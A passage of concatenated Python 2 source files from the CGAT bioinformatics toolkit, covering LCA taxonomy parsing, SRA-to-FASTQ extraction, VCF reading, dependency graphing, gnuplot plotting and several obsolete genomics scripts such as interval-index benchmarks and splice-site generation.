if not self.kingdom_plus:
self.kingdom_plus = "NA"
if not self.kingdom_plus_plus:
self.kingdom_plus_plus = "NA"
if not self.phylum:
self.phylum = "NA"
if not self.phylum_plus:
self.phylum_plus = "NA"
if not self.phylum_plus_plus:
self.phylum_plus_plus = "NA"
if not self._class:
self._class = "NA"
if not self._class_plus:
self._class_plus = "NA"
if not self._class_plus_plus:
self._class_plus_plus = "NA"
if not self.order:
self.order = "NA"
if not self.order_plus:
self.order_plus = "NA"
if not self.order_plus_plus:
self.order_plus_plus = "NA"
if not self.family:
self.family = "NA"
if not self.family_plus:
self.family_plus = "NA"
if not self.family_plus_plus:
self.family_plus_plus = "NA"
if not self.genus:
self.genus = "NA"
if not self.genus_plus:
self.genus_plus = "NA"
if not self.genus_plus_plus:
self.genus_plus_plus = "NA"
if not self.species:
self.species = "NA"
if not self.species_plus:
self.species_plus = "NA"
if not self.species_plus_plus:
self.species_plus_plus = "NA"
return self
###############################
###############################
###############################
def iterate(infile):
'''
LCA results iterator
'''
for line in infile.readlines():
lca = LCA()
lca = lca.parse(line)
yield lca
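# Hypothetical sketch: parse a single made-up line of the expected
# ';'-separated format "<id>;<score>;[Level] name;...". Expected result:
# ('Bacteria', 'Firmicutes', 'Bacillus_subtilis'); absent levels become "NA".
def _demo_parse():
    line = ("read1;-1;[SuperKingdom] Bacteria;[Phylum] Firmicutes;"
            "[Class] Bacilli;[Genus] Bacillus;[Species] Bacillus subtilis")
    lca = LCA().parse(line)
    return lca.domain, lca.phylum, lca.species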
```
#### File: cgat/CGAT/Sra.py
```python
import os
import glob
import tempfile
import shutil
import CGAT.Experiment as E
import CGAT.Fastq as Fastq
import CGAT.IOTools as IOTools
def peek(sra, outdir=None):
"""return the full file names for all files which will be extracted
Parameters
----------
outdir : path
perform extraction in outdir. If outdir is None, the extraction
will take place in a temporary directory, which will be deleted
afterwards.
Returns
-------
files : list
A list of fastq formatted files that are contained in the archive.
format : string
The quality score format in the :term:`fastq` formatted files.
"""
if outdir is None:
workdir = tempfile.mkdtemp()
else:
workdir = outdir
# --split-files creates files called prefix_#.fastq.gz,
# where # is the read number.
    # If the file contains paired-end data:
# output = prefix_1.fastq.gz, prefix_2.fastq.gz
# *special case: unpaired reads in a paired end --> prefix.fastq.gz
# *special case: if paired reads are stored in a single read,
# fastq-dump will split. There might be a joining
# sequence. The output would thus be:
# prefix_1.fastq.gz, prefix_2.fastq.gz, prefix_3.fastq.gz
# You want files 1 and 3.
E.run("""fastq-dump --split-files --gzip -X 1000
--outdir %(workdir)s %(sra)s""" % locals())
f = sorted(glob.glob(os.path.join(workdir, "*.fastq.gz")))
ff = [os.path.basename(x) for x in f]
if len(f) == 1:
# sra file contains one read: output = prefix.fastq.gz
pass
elif len(f) == 2:
# sra file contains read pairs:
# output = prefix_1.fastq.gz, prefix_2.fastq.gz
assert ff[0].endswith(
"_1.fastq.gz") and ff[1].endswith("_2.fastq.gz")
elif len(f) == 3:
if ff[2].endswith("_3.fastq.gz"):
f = glob.glob(os.path.join(workdir, "*_[13].fastq.gz"))
        else:
            # third file is the unpaired prefix.fastq.gz: keep the read pairs
            f = glob.glob(os.path.join(workdir, "*_[12].fastq.gz"))
# check format of fastqs in .sra
fastq_format = Fastq.guessFormat(IOTools.openFile(f[0], "r"), raises=False)
fastq_datatype = Fastq.guessDataType(IOTools.openFile(f[0], "r"), raises=True)
if outdir is None:
shutil.rmtree(workdir)
return f, fastq_format, fastq_datatype
def extract(sra, outdir, tool="fastq-dump"):
"""return statement for extracting the SRA file in `outdir`.
possible tools are fastq-dump and abi-dump. Use abi-dump for colorspace"""
if tool == "fastq-dump":
tool += " --split-files"
statement = """%(tool)s --gzip --outdir %(outdir)s %(sra)s""" % locals()
return statement
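# Hypothetical usage sketch: peek at an archive to learn its layout and quality
# format, then build the extraction statement. "local.sra" is a made-up path
# and fastq-dump must be on the PATH for peek() to work.
def _demo_sra(sra="local.sra", outdir="extracted"):
    files, fastq_format, fastq_datatype = peek(sra)
    statement = extract(sra, outdir)
    return files, fastq_format, statement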
```
#### File: cgat/CGAT/VCF.py
```python
import sys
class VCFEntry:
"""A VCF Entry"""
def __init__(self, data, samples):
assert len(data) == len(samples) + 9
self.contig, self.pos, self.id, self.ref, self.alt, self.qual, \
self.filter, self.info, self.format = \
data[:9]
self.genotypes = dict(zip(samples, data[9:]))
self.order = samples
def __str__(self):
return "\t".join(map(str, (
self.contig, self.pos, self.id, self.ref, self.alt, self.qual,
self.filter, self.info, self.format,
"\t".join([self.genotypes[x] for x in self.order]))))
class VCFFile:
"""A VCF File"""
def __init__(self, infile):
self.infile = infile
self.format = {}
self.info = {}
self.fileformat = None
while 1:
line = self.infile.readline()
if line.startswith("##"):
self.addMetaFromLine(line[2:-1])
continue
elif line.startswith("#CHROM"):
self.samples = line[:-1].split("\t")[9:]
continue
elif line.startswith("#"):
continue
break
self.line = line
def writeHeader(self, outfile, order=None):
outfile.write("##fileformat=%s\n" % self.fileformat)
for key, values in self.format.iteritems():
outfile.write("##FORMAT=%s,%s\n" % (key, ",".join(values)))
for key, values in self.info.iteritems():
outfile.write("##INFO=%s,%s\n" % (key, ",".join(values)))
outfile.write(
"#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t")
if order:
assert len(order) == len(self.samples), \
"number of samples do not match: %i != %i" % (
len(order), len(self.samples))
outfile.write("\t".join(order))
else:
outfile.write("\t".join(self.samples))
outfile.write("\n")
def __iter__(self):
return self
def addMetaFromLine(self, line):
key, value = line.split("=", 1)
if key == "INFO":
data = value.split(",")
self.info[data[0]] = data[1:]
elif key == "FORMAT":
data = value.split(",")
self.format[data[0]] = data[1:]
elif key == "fileformat":
self.fileformat = value
def next(self):
data = self.line[:-1].split("\t")
self.line = self.infile.readline()
if not self.line:
raise StopIteration
return VCFEntry(data, self.samples)
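# Hypothetical sketch: copy a VCF from one file handle to another, keeping the
# header and the original sample order.
def _demo_copy_vcf(infile, outfile):
    vcf = VCFFile(infile)
    vcf.writeHeader(outfile)
    for entry in vcf:
        outfile.write(str(entry) + "\n")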
if __name__ == "__main__":
inf = VCFFile(sys.stdin)
for x in inf:
print str(x)
```
#### File: cgat/dependency_graph/graph.py
```python
import sys
import os
from snakefood.depends import read_depends, eliminate_redundant_depends
prefix = '''
# This file was generated by sfood-graph.
strict digraph "dependencies" {
graph [
rankdir = "LR",
overlap = "scale",
size = "8,10",
ratio = "fill",
fontsize = "16",
fontname = "Helvetica",
clusterrank = "local"
]
node [
fontsize=%s
shape=ellipse
// style=filled
// shape=box
];
'''
postfix = '''
}
'''
COLORS = ["#999999", "#E69F00", "#56B4E9", "#009E73",
"#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
def graph(pairs, write, fontsize, color_map):
"Given (from, to) pairs of (root, fn) files, output a dot graph."
write(prefix % fontsize)
for (froot, f), (troot, t) in pairs:
if opts.pythonify_filenames:
f = normpyfn(f)
t = normpyfn(t)
if opts.full_pathnames:
f = os.path.join(froot, f)
if troot:
t = os.path.join(troot, t)
if troot is None:
dn = os.path.dirname(f)
if dn not in color_map:
color_map[dn] = COLORS[len(color_map) % len(COLORS)]
write('"%s" [style=filled, color="%s"];\n' % (f, color_map[dn]))
else:
write('"%s" -> "%s";\n' % (f, t))
write(postfix)
def normpyfn(fn):
"Normalize the python filenames for output."
if fn is None:
return fn
if fn.endswith('.py'):
fn = fn[:-3]
fn = fn.replace(os.sep, '.')
return fn
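# Hypothetical sketch (see main() below for the real entry point): render a
# tiny two-entry dependency list to stdout. graph() reads the module-level
# ``opts``, so a stand-in optparse.Values is installed first.
def _demo_graph():
    import optparse
    global opts
    opts = optparse.Values({"pythonify_filenames": False,
                            "full_pathnames": False})
    pairs = [(("/src", "a.py"), ("/src", "b.py")),
             (("/src", "b.py"), (None, None))]
    graph(pairs, sys.stdout.write, fontsize=10, color_map={})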
def main():
import optparse
parser = optparse.OptionParser(__doc__.strip())
parser.add_option('-f', '--full-pathnames', '--full', action='store_true',
help="Output the full pathnames, not just the relative.")
parser.add_option('-p', '--pythonify-filenames', '--remove-extensions',
action='store_true',
help="Remove filename extensions in the graph and "
"replace slashes with dots.")
parser.add_option('-r', '--redundant', action='store_false', default=True,
help="Do not eliminate redundant dependencies.")
parser.add_option('--fontsize', action='store', type='int',
default=10,
help="The size of the font to use for nodes.")
global opts
opts, args = parser.parse_args()
if not args:
args = ['-']
color_map = {}
for fn in args:
if fn == '-':
f = sys.stdin
else:
f = open(fn)
depends = read_depends(f)
if opts.redundant:
depends = eliminate_redundant_depends(depends)
graph(depends, sys.stdout.write, opts.fontsize, color_map)
if __name__ == "__main__":
main()
```
#### File: cgat/legacy/gnuplot_data.py
```python
import sys, re, string, os, getopt, time, tempfile
USAGE = """python %s < stdin > stdout
plot a histogram (or a set of histograms).
-v, --verbose verbosity
-l, --legend set legend
-t, --title set title
-c, --hardcopy create hardcopy of picture
-w, --with with command to gnuplot (for example, "points")
-f, --fit do linear fit to data
-i, --files plot a set of files
-o, --logscale=# set logscale
-u, --function= plot a function
'#' at start of line is a comment
""" % sys.argv[0]
param_long_options = ["help", "verbose=", "legend=", "title=", "hardcopy=", "blackwhite", "with=", "fit", "files=",
"logscale=", "function="]
param_short_options = "hv:l:t:c:bw:fi:o:u:"  # "o:" added so the -o/--logscale option is accepted
param_legend = None
param_title = None
param_hardcopy = None
param_blackwhite = None
param_terminal = "postscript"
param_with="points"
param_fit = None
param_logscale = None
param_filenames = None
param_function = None
import Experiment
import Histogram
import Gnuplot
def PlotFit( g, data, cols=(0,1) ):
fh1, fn1 = tempfile.mkstemp()
a,b = cols
os.close(fh1)
outfile = open(fn1, "w")
for d in data: outfile.write("%f\t%f\n" % (d[a], d[b]))
outfile.close()
parameters = {}
fh2, fn2 = tempfile.mkstemp()
fh3, fn3 = tempfile.mkstemp()
os.close(fh2)
os.close(fh3)
open(fn2, 'w').write('m=0\nb=0\n')
g("f%i(x) = m * x + y0" % b)
g("fit f%i(x) '%s' using 1:2 via y0, m" % (b, fn1))
g("replot f%i(x)" % (b))
## g('fit m*x+b "%s" via "%s"' % (fn1, fn2) )
## g('update "%s" "%s"' % (fn2, fn3))
## execfile( fn3, globals(), parameters )
## g.replot( Gnuplot.Func( "%f*x + %f" % (parameters['m'], parameters['b']) ) )
return [fn1, fn2, fn3]
def Fit( data, cols=(0,1) ):
import scipy.linalg
a,b = cols
matrix = []
imatrix = []
for d in data:
matrix.append([1.0, d[a]]) # for y = a + bx
imatrix.append([1.0, d[b]]) # for x = a + by
coeffs = scipy.linalg.lstsq(matrix, map(lambda x: x[b], data))[0]
icoeffs = scipy.linalg.lstsq(imatrix, map(lambda x: x[a], data))[0]
f = "%f + %f*x" % (coeffs[0], coeffs[1])
r2 = coeffs[1] * icoeffs[1]
return Gnuplot.Func( f, title="%s (r^2=%f)" % (f, r2))
##---------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
try:
optlist, args = getopt.getopt(sys.argv[1:],
param_short_options,
param_long_options)
except getopt.error, msg:
print USAGE, msg
sys.exit(1)
for o,a in optlist:
if o in ("-l", "--legend"):
param_legend = string.split( a, "," )
elif o in ("-t", "--title"):
param_title = a
elif o in ("-c", "--hardcopy"):
param_hardcopy = a
if re.search( "\.png$", a):
param_terminal = "png"
elif o in ("-b", "--blackwhite"):
param_blackwhite = 1
elif o in ("-w", "--with"):
param_with = a
elif o in ("-f", "--fit"):
param_fit = 1
elif o in ("-u", "--function"):
param_function = string.split(a,",")
elif o in ("-i", "--files"):
param_filenames = string.split(a, ",")
elif o in ("-o", "--logscale"):
param_logscale = a
if len(args) > 0:
print USAGE, "no arguments needed."
sys.exit(1)
print Experiment.GetHeader()
print Experiment.GetParams()
if not param_hardcopy:
g = Gnuplot.Gnuplot(debug=1, persist=1)
else:
g = Gnuplot.Gnuplot(debug=1)
if param_filenames:
filenames = param_filenames
else:
filenames = ["-"]
if param_logscale:
g("set logscale %s" % param_logscale)
for filename in filenames:
if filename == "-":
            lines = filter( lambda x: x[0] != "#", sys.stdin.readlines())
        else:
            lines = filter( lambda x: x[0] != "#", open(filename).readlines())
if param_legend:
data = map( lambda x: map(string.atof, string.split(x[:-1], "\t")), lines)
legend = [param_legend[0]] + param_legend[1:len(data[0])]
del param_legend[1:len(data[0])]
else:
legend = string.split(lines[0][:-1], "\t")
data = map( lambda x: map(string.atof, string.split(x[:-1], "\t")), lines[1:])
g.clear()
if param_title:
g.title( param_title )
g.xlabel( legend[0] )
for x in range(1, len(legend)):
g.replot( Gnuplot.Data( data, cols=(0, x),
xwith = param_with,
title =legend[x]) )
if param_fit:
g.replot(Fit( data, cols=(0,x)))
if param_function:
for f in param_function:
g.replot( Gnuplot.Func( f ) )
g.refresh()
if param_hardcopy:
g.hardcopy( param_hardcopy,
terminal = param_terminal )
## g.replot( Gnuplot.File( fn1,
## using="1:2",
## with = param_with,
## title=legend[x]) )
# print d.filename
## temps += PlotFit( g, data, cols=(0, x) )
# print d.filename
```
#### File: cgat/obsolete/adda2coverage.py
```python
import os
import sys
import re
import optparse
import CGAT.Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = E.OptionParser( version = "%prog version: $Id: adda2coverage.py 2781 2009-09-10 11:33:14Z andreas $", usage = globals()["__doc__"] )
parser.add_option("-f", "--filename-lengths", dest="filename_lengths", type="string",
help="filename with length information [default=%default]." )
parser.set_defaults(
filename_lengths = "test",
)
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser, argv = argv )
map_id2length = {}
for line in open(options.filename_lengths, "r"):
if line.startswith("#"): continue
if line.startswith("id\t"): continue
id, length = line[:-1].split()[:2]
map_id2length[bytes(id)] = int(length)
E.info("read sequence length information for %i sequences" % len(map_id2length) )
## do sth
ninput, nskipped, noutput = 0, 0, 0
def iterator_domains( infile ):
last = None
for line in infile:
if line.startswith("#"): continue
if line.startswith("id\t"): continue
id, start, end, family = line[:-1].split()
if id != last:
if last: yield domains
domains = []
last = id
domains.append( (bytes(id), int(start), int(end), bytes(family) ) )
yield domains
options.stdout.write( "id\tcoverage\n" )
for domains in iterator_domains( options.stdin ):
ninput += 1
id = domains[0][0]
if id not in map_id2length:
nskipped += 1
E.warn( "length for sequence %s not known" % id )
continue
t = sum( [ x[2] - x[1] for x in domains ] )
options.stdout.write( "%s\t%5.2f\n" % (id, 100.0 * t / map_id2length[id] ) )
noutput += 1
E.info( "ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput,nskipped) )
## write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: cgat/obsolete/benchmark_ranges.py
```python
import os, sys, re, optparse, timeit, random, time
import CGAT.NCL as ncl
try:
    import rtree  # the benchmark code below uses rtree.Rtree()
HAVE_RTREE = True
except ImportError, msg:
HAVE_RTREE = False
try:
import bx.intervals.io
import bx.intervals.intersection
HAVE_BX = True
except ImportError, msg:
HAVE_BX = False
try:
from bme10.fast import *
HAVE_BME = True
except ImportError, msg:
HAVE_BME = False
try:
import quicksect
HAVE_QUICKSECT = True
except ImportError, msg:
HAVE_QUICKSECT = False
import CGAT.Experiment as E
def generate_uniform_segments( workspace_size, segment_size, num_segments ):
"""generate a uniformly covering set of segments without overlap
If num_segments == 0, the segments are packed without gaps. Otherwise they are
uniformly distributed.
"""
if num_segments == 0:
for x in xrange( 0, workspace_size, segment_size):
yield (x, min(workspace_size,x+segment_size) )
else:
space = workspace_size - segment_size * num_segments
increment = space // num_segments
x = 0
for y in xrange( num_segments):
yield( x, min(workspace_size,x+segment_size) )
x += segment_size + increment
def generate_overlapping_segments( workspace_size, segment_size, num_segments ):
"""generate a covering set of segments with overlap
    Generates a fully covering set of segments. A covering set of segments is built from segment_size.
    Later, segments of twice the size are added overlapping the previous set, and so on until
    the final segment covers the full workspace.
"""
s = segment_size
while s < workspace_size:
for x in xrange( 0, workspace_size, s):
yield (x, min(workspace_size,x+s) )
s *= 2
yield( 0, workspace_size )
def generate_random_segments( workspace_size, segment_size, num_segments ):
"""generate randomly positioned and sized segments."""
for x in range(num_segments):
start = random.randint( 0, workspace_size )
end = random.randint( start, workspace_size )
yield (start, end)
def sample_uniform_segments( workspace_size, segment_size ):
"""sample from a uniform set of covering segments without overlap
"""
starts = list(range( 0, workspace_size, segment_size))
random.shuffle( starts )
for x in starts:
yield (x, min(workspace_size,x+segment_size) )
def bx_create( segmenter ):
intersector = bx.intervals.intersection.Intersecter()
for start, end in segmenter:
intersector.add_interval( bx.intervals.Interval(start,end) )
return intersector
def bx_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ))
return result
def ncl_create( segmenter ):
index = ncl.IntervalDB()
index.fromlist( [ (coords[0],coords[1],id) for id,coords in enumerate( segmenter ) ] )
return index
def ncl_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find_overlap( start, end ))
return result
def nclpy_create( segmenter ):
index = ncl.NCL()
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
return index
def nclpy_create_on_disk( segmenter ):
index = ncl.NCL( filestem = "tmp", force=True )
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
return index
def nclpy_create_on_disk_and_flush( segmenter ):
index = ncl.NCL( filestem = "tmp", force=True )
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
del index
return ncl.NCL( filestem = "tmp" )
def nclpy_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ))
return result
def bme_create( segmenter ):
index = GFile( [ Interval( "1", start, end) for start, end in segmenter],
header = {CHROM:0,START:1,END:2} )
return index
def bme_lookup( index, sampler ):
for start, end in sampler:
result = list(index.intersection( Interval( "1", start, end ) ))
return result
def quicksect_create( segmenter ):
IntervalNode = quicksect.IntervalNode
Feature = quicksect.Feature
x = segmenter.next()
index = IntervalNode( Feature( x[0], x[1]) )
for start, end in segmenter:
index = index.insert( Feature( start, end) )
return index
def quicksect_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ) )
return result
class RTreeIndex:
def __init__( self ):
self.index = rtree.Rtree()
def add( self, x, start, end ):
self.index.add(x, (start, 0, end-1, 0))
def find( self, start, end ):
return self.index.intersection( (start, 0, end-1,0) )
def rtree_create( segmenter ):
index = rtree.Rtree()
x = 0
for start, end in segmenter:
x += 1
index.add(x, (start, 0, end-1, 0) )
return index
def rtree_lookup( index, sampler ):
for start, end in sampler:
result = list(index.intersection( (start, 0, end-1,0) ))
return result
def rtree2_create( segmenter ):
index = RTreeIndex()
x = 0
for start, end in segmenter:
x += 1
index.add(x, start, end )
return index
def rtree2_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end) )
return result
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = E.OptionParser( version = "%prog version: $Id$", usage = globals()["__doc__"] )
parser.add_option( "--segments", dest="segment_function", type="choice",
choices=("uniform", "overlapping", "random", ),
help="segment layout [default=%default]." )
parser.set_defaults(
workspace_size = 10000000,
segment_size = 1000,
segment_sizes = (10, 100, 1000),
num_segments = (10, 100, 1000, 10000),
verify = False,
segment_function = "uniform",
)
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser )
pairs = [
("ncl:lowlevel-api", ncl_create, ncl_lookup),
("ncl:memory", nclpy_create, nclpy_lookup),
("ncl:disk:create", nclpy_create_on_disk, nclpy_lookup),
# ("nclpy:disk:use", nclpy_create_on_disk_and_flush, nclpy_lookup),
]
if HAVE_BME:
pairs.append( ("bme:memory", bme_create, bme_lookup), )
if HAVE_RTREE:
pairs.extend( [
("rtree", rtree_create, rtree_lookup),
("rtree wrapper", rtree2_create, rtree2_lookup), ] )
if HAVE_BX:
pairs.append( ("python.bx", bx_create, bx_lookup) )
if HAVE_QUICKSECT:
pairs.append( ("quicksect", quicksect_create, quicksect_lookup) )
# pairs = ( ("quicksect", quicksect_create, quicksect_lookup), )
# options.num_segments = [0]
segment_function = { "uniform" : generate_uniform_segments,
"overlapping" : generate_overlapping_segments,
"random" : generate_random_segments,
}[options.segment_function]
if options.verify:
for segment_size in options.segment_sizes:
            # note: num_segments is not defined in this branch; use the first
            # configured value so the verification code can run
            segmenter = segment_function( options.workspace_size, segment_size, options.num_segments[0] )
sampler = sample_uniform_segments( options.workspace_size, segment_size )
segments = list( segmenter)
indices = []
for name, create, lookup in pairs:
indices.append( create( segments ) )
for start,end in sampler:
for index, v in zip( indices, pairs):
name, create, lookup = v
intervals = list(lookup( index, ((start,end),) ))
print name, intervals
else:
sys.stdout.write("name\tsize\tnsegs\ttcreate\ttlookup\n" )
for num_segments in options.num_segments:
for segment_size in options.segment_sizes:
for name, create, lookup in pairs:
segmenter = segment_function( options.workspace_size, segment_size, num_segments )
sampler = sample_uniform_segments( options.workspace_size, segment_size )
t0 = time.time()
index = create(segmenter)
t1 = time.time()
lookup( index, sampler )
t2 = time.time()
sys.stdout.write( "%s\t%i\t%i\t%f\t%f\n" % (name, segment_size, num_segments, t1-t0, t2-t1 ) )
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
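As a stand-alone illustration of one of the back-ends benchmarked above, here is a hedged sketch of the bx-python interval index used by `bx_create()` and `bx_lookup()`. It assumes bx-python is installed; the coordinates and the query range are made up for the example.
```python
# Build an Intersecter the way bx_create() does, then query it the way
# bx_lookup() does. Coordinates are illustrative only.
from bx.intervals.intersection import Intersecter, Interval

intersector = Intersecter()
for start, end in ((0, 1000), (500, 1500), (2000, 2500)):
    intersector.add_interval(Interval(start, end))

# find every stored interval overlapping the query range [900, 1100)
hits = intersector.find(900, 1100)
print [(x.start, x.end) for x in hits]   # expect the first two intervals back
```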
#### File: cgat/obsolete/Dots.py
```python
import string
import alignlib
def ReadFromFile( file, min_dot_score = 0 ):
"""read dots from a file.
"""
dots_list = file.readlines()
dots = alignlib.makeAlignataMatrixRow()
max_row = 0
max_col = 0
has_prefix = None
checked_prefix = None
for dot in dots_list:
if dot == "\n": continue
if dot[0] == "#": continue
if dot[0] == "d": continue
data = string.split(dot, "\t")
        if len(data) < 2: raise ValueError("parsing error in line: %s" % dot)
if not checked_prefix:
            # string.find returns -1 when "-" is absent, so test explicitly
            if string.find(data[0], "-") >= 0: has_prefix = 1
checked_prefix = 1
row, col = data[:2]
if has_prefix:
row=string.split(row, "-")[1]
col=string.split(col, "-")[1]
row = string.atoi(row)
col = string.atoi(col)
if len(data) >= 3:
score = string.atof( data[2] )
if score < min_dot_score:
continue
else:
score = 0
max_row = max( max_row, row)
max_col = max( max_col, col)
dots.addPairExplicit( row, col, score)
return max_row, max_col, dots
```
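A hedged sketch of the dot-file format that `ReadFromFile()` above expects: tab-separated row and column residue indices plus an optional score. The file name and the score threshold are illustrative, and the snippet assumes the file above is importable as `Dots` with alignlib available.
```python
# Write a tiny dot file and read it back; lines starting with "#" or "d" are
# skipped, and dots scoring below min_dot_score are discarded.
import Dots

outf = open("example.dots", "w")
outf.write("# row\tcol\tscore\n")
outf.write("1\t3\t0.9\n")
outf.write("2\t4\t0.2\n")   # filtered out by min_dot_score below
outf.close()

max_row, max_col, dots = Dots.ReadFromFile(open("example.dots"), min_dot_score=0.5)
print max_row, max_col      # -> 1 3
```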
#### File: cgat/obsolete/fasta2spliced.py
```python
import sys
import string
import re
import optparse
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
# the main block below also uses GTF, GFF and IOTools
import CGAT.GTF as GTF
import CGAT.GFF as GFF
import CGAT.IOTools as IOTools
if __name__ == "__main__":
parser = E.OptionParser( version = "%prog version: $Id: fasta2spliced.py 2861 2010-02-23 17:36:32Z andreas $")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome." )
parser.add_option("-r", "--filename-regions", dest="filename_regions", type="string",
help="filename with region information in GFF format." )
parser.add_option( "-p", "--output-filename-pattern", dest="output_filename_pattern", type="string" ,
help="OUTPUT filename pattern for additional data [%default].")
parser.add_option( "--joined", dest="joined", action="store_true",
help="output mode. If joined, all is output in one big chromosome. Otherwise, each are single fragments [%default].")
parser.add_option( "--only-first", dest="only_first", action="store_true",
help="only output the first possible splice site [%default].")
parser.set_defaults(
genome_file = "genome",
filename_regions = None,
output_format = "%08i",
output_filename_pattern = "%s",
methods = [],
splice_pairs = ( ("GT", "AG"), ),
min_intron_size = 30,
max_intron_size = 25000,
search_area = 5, # 10
read_length = 32,
only_first = False,
joined = False,
max_join_length = 1000000, # 100000000
format_id = "seg%05i",
)
(options, args) = E.Start( parser )
genome = IndexedFasta.IndexedFasta( options.genome_file )
assert options.filename_regions != None, "please supply a gff formatted filename with regions"
regions = GTF.readAsIntervals( GFF.iterator( IOTools.openFile(options.filename_regions, "r" ) ) )
# build pairs for complement
reverse_splice_pairs = []
forward_splice_pairs = options.splice_pairs
left_tokens, right_tokens = {}, {}
x = 0
for a,b in forward_splice_pairs:
assert len(a) == 2, "only two-residue patterns allowed"
assert len(b) == 2, "only two-residue patterns allowed"
ca, cb = Genomics.complement( a ), Genomics.complement( b )
reverse_splice_pairs.append( (b,a) )
left_tokens[a] = x
left_tokens[cb] = x+1
right_tokens[b] = x
right_tokens[ca] = x+1
x += 2
search_area = options.search_area
read_length = options.read_length
joined = options.joined
ninput, noutput = 0, 0
if joined:
outfile_coordinates = IOTools.openFile( options.output_filename_pattern % "coords", "w" )
outfile_coordinates.write( "segment\tpos\tcontig\t5start\t3start\n" )
out_contig = 1
options.stdout.write( ">%s\n" % (options.format_id % out_contig ))
nbases = 0
separator = "N" * read_length
lseparator = len(separator)
    # contig sizes are needed whether or not output is joined
    contig_sizes = genome.getContigSizes()
# collect possible start/end points of introns
for contig, lcontig in contig_sizes.items():
ninput += 1
nintrons = 0
if contig not in regions:
E.debug( "skipped %s - no intervals defined" % (contig))
continue
sequence = genome.getSequence( contig, as_array = True )
E.debug( "processing %s of length %i" % (contig, len(sequence)))
regions[contig].sort()
left_positions, right_positions = [], []
def addPositions( start, end, tokens, positions, forward = True, first = False ):
area = sequence[start:end].upper()
if forward:
for x in range(len(area)-1):
t = area[x:x+2]
if t in tokens:
positions.append( (start+x,tokens[t] ) )
if first: return True
else:
for x in range(len(area)-2,-1,-1):
t = area[x:x+2]
if t in tokens:
positions.append( (start+x,tokens[t] ) )
if first: return True
return False
intron_start = regions[contig][0][1]
for exon_start,exon_end in regions[contig][1:]:
intron_end = exon_start
if options.only_first:
if not addPositions( intron_start, intron_start+search_area, left_tokens, left_positions, forward=True, first = True ):
addPositions( intron_start-search_area, intron_start, left_tokens, left_positions, forward=False, first = True )
if not addPositions( intron_end-search_area, intron_end, right_tokens, right_positions, forward=False, first = True ):
addPositions( intron_end, intron_end+search_area, right_tokens, right_positions, forward=True, first = True )
else:
addPositions( intron_start-search_area, intron_start+search_area, left_tokens, left_positions, forward=True, first = False )
addPositions( intron_end-search_area, intron_end+search_area, right_tokens, right_positions, forward=True, first = False )
intron_start = exon_end
E.debug("%s: left=%i, right=%i" % (contig, len(left_positions), len(right_positions) ))
# build possible introns
#
# iterate over left positions and collect right positions within a radius
# given by min_intron_size and max_intron_size.
# left_positions and right_positions are sorted
ri, mr = 0, len(right_positions)
for l,t in left_positions:
lower_bound, upper_bound = l + options.min_intron_size, l + options.max_intron_size
while ri < mr and right_positions[ri][0] < lower_bound: ri += 1
rri = ri
while rri < mr and right_positions[rri][0] < upper_bound:
if right_positions[rri][1] == t:
# positions are start/end of splice motif
# so add two on the right side
r = right_positions[rri][0]+2
lmin = max(0, l-read_length )
rmax = min( lcontig, r + read_length )
if options.loglevel >= 3:
options.stdlog.write("# adding intron on %s: l=%i, r=%i, t=%i, %s %s %s %s\n" %\
(contig, l, r, t,
sequence[lmin:l],
sequence[l:l+2],
sequence[r-2:r],
sequence[r:rmax] ) )
if joined:
outfile_coordinates.write("%s\t%i\t%s\t%i\t%i\n" % (options.format_id % out_contig, nbases, contig, lmin, r ) )
s = sequence[lmin:l] + sequence[r:rmax]
options.stdout.write( "%s\n%s\n" % (s, separator ) )
nbases += len(s) + lseparator
if nbases > options.max_join_length:
nbases = 0
out_contig += 1
options.stdout.write( ">%s\n" % (options.format_id % out_contig ) )
else:
options.stdout.write( ">%s_%i_%i\n%s%s\n" % (contig, lmin, r,
sequence[lmin:l],
sequence[r:rmax] ) )
nintrons += 1
noutput += 1
rri += 1
E.info( "contig %s: %i introns" % (contig, nintrons))
E.info( "ninput=%i, noutput=%i" % (ninput, noutput) )
E.Stop()
```
#### File: cgat/obsolete/gff2annotator.py
```python
import sys
import string
import re
import optparse
import time
import os
import shutil
import tempfile
import math
import itertools
import glob
import collections
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.GFF as GFF
import CGAT.IndexedFasta as IndexedFasta
import CGAT.IOTools as IOTools
import CGATPipelines.PipelineEnrichment as PipelineEnrichment
USAGE = """python %s [OPTIONS] < stdin > stdout
convert a gff file into annotator compatible regions. Depending on the option --section
this script will create:
segments
a segments file
annotations
a file with annotations. Multiple gff files can be provided.
annotations-genes
if gtf files are provided (ending in .gtf), multiple subsets can be created using the
--subset option (which may be given multiple times). In this case a list of gene_ids for each subset is required.
annotations-go
a file with annotations. Input is a gtf file and a map of gene identifiers
to categories. Requires --input-filename-map.
annotations-gff
take all annotations in a gff file and create individual annotations for each feature
encountered. Multiple files will be aggregated if they contain the same feature.
workspace
a file with a workspace
""" % sys.argv[0]
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
